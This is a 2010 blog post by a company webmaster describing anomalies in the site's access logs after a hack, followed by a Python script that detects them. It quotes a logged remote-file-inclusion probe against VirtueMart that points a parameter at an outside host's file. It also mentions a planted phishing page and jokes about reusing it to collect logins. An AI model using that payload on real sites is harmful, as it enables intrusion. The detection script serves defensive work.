Sunday, August 29, 2010

Webmaster - The Operator in Matrix

I have been a webmaster of our company website for a few months now, and it reminds me of the Operator in the Matrix.


After the company website got hacked, I took on the role of maintaining the website as well.  I find myself parsing through access and error logs looking for anomalies.  To the average Joe, I guess it could look a lot like the Matrix.

However, staring at the "Matrix" has proven to be quite informative.  Although I found no hot blonde in a red dress, I did learn a thing or two about the www.  I didn't realize there are so many search engines out there. Here are a few I spotted in our access logs:

  1. Google
  2. Yahoo (slurp)
  3. Baidu
  4. MSN
  5. Sogou
  6. Youdao
  7. Soso
Déjà vu in the Matrix? I got a few of those.  Here are a few anomalies I spotted:

89.108.67.164 - - [31/Jul/2010:20:33:55 +0800] "GET /website/index.php/component/virtuemart/details/117/69/remote-power-control/server-technology/switched-cdu///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 200 45891 "-" "libwww-perl/5.812"

Spot anything?  Turns out it is an attempt to exploit a vulnerability in VirtueMart <=1.1.3.  Good thing that since I redid the website, I know exactly what is in it.  I have *all* the website components' release RSS feeds in my Google Reader, set up some kind of test bed and source control, and make it a habit of patching the website soon after a release.  For the nitpicking smarty-pants out there, no, I don't mean all the components of the website; that is why the *all* is quoted with asterisks. I am not maintaining the website's Apache, PHP and MySQL infrastructure; let's hope our web-hosting company does a good job of maintaining that.

66.113.102.253 - - [31/Jul/2010:21:41:39 +0800] "GET /website/components/chase.com/logon_confirm/index.htm HTTP/1.1" 404 2203 "-" "Mozilla/5.0 (compatible; Fedora Core 5) FC5 KDE"

Looks like the hacker's script that planted the phony JP Morgan Chase page on our website back in March still thinks we are hosting their page.  Hmm... since the hacker is already directing traffic to our site, maybe I should rebuild the logon page and collect the login information for my own evil use.


Arrwaaaaaa hahahhaha! (The Evil laughter)
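A small log-scanning script written for this post, not the blog author's own code: it parses Apache combined-format lines like the two quoted above and flags the remote-file-inclusion signature (a query parameter whose value is itself a URL, plus a libwww-perl user agent) and 404s for paths that embed another brand's domain name, the leftover phishing traffic. The third sample line is a constructed benign request added for contrast.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Sample log: the two anomalies quoted in the post plus one constructed benign hit (192.0.2.1 is a test-net address).
SAMPLE_LOG = """\
89.108.67.164 - - [31/Jul/2010:20:33:55 +0800] "GET /website/index.php/component/virtuemart/details/117/69/remote-power-control/server-technology/switched-cdu///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 200 45891 "-" "libwww-perl/5.812"
66.113.102.253 - - [31/Jul/2010:21:41:39 +0800] "GET /website/components/chase.com/logon_confirm/index.htm HTTP/1.1" 404 2203 "-" "Mozilla/5.0 (compatible; Fedora Core 5) FC5 KDE"
192.0.2.1 - - [31/Jul/2010:22:00:00 +0800] "GET /website/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def find_anomalies(line):
    """Return the list of rules a single log line trips (empty list = looks normal)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    r = m.groupdict()
    parts = urlsplit(r["target"])
    reasons = []
    # 1. Remote file inclusion: a parameter value that is itself a URL
    #    (the mosConfig.absolute.path=http://... pattern from the VirtueMart probe).
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if re.match(r"https?://", value, re.I):
            reasons.append("rfi:" + value)
            break
    # 2. Scripted client: libwww-perl is the user agent the probe above used.
    if r["agent"].lower().startswith("libwww-perl"):
        reasons.append("script-ua")
    # 3. Leftover phishing traffic: a 404 for a path that embeds a brand's domain
    #    (e.g. /chase.com/logon_confirm/), i.e. a removed phishing page still being hit.
    if r["status"] == "404" and re.search(r"/[a-z0-9-]+\.(com|net|org)/", parts.path, re.I):
        reasons.append("phish-path")
    return reasons


def scan(log_text):
    """Map each client IP to the reasons its requests were flagged; clean IPs are omitted."""
    hits = {}
    for line in log_text.splitlines():
        reasons = find_anomalies(line)
        if reasons:
            hits.setdefault(line.split(" ", 1)[0], []).extend(reasons)
    return hits


if __name__ == "__main__":
    for ip, why in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(why))
```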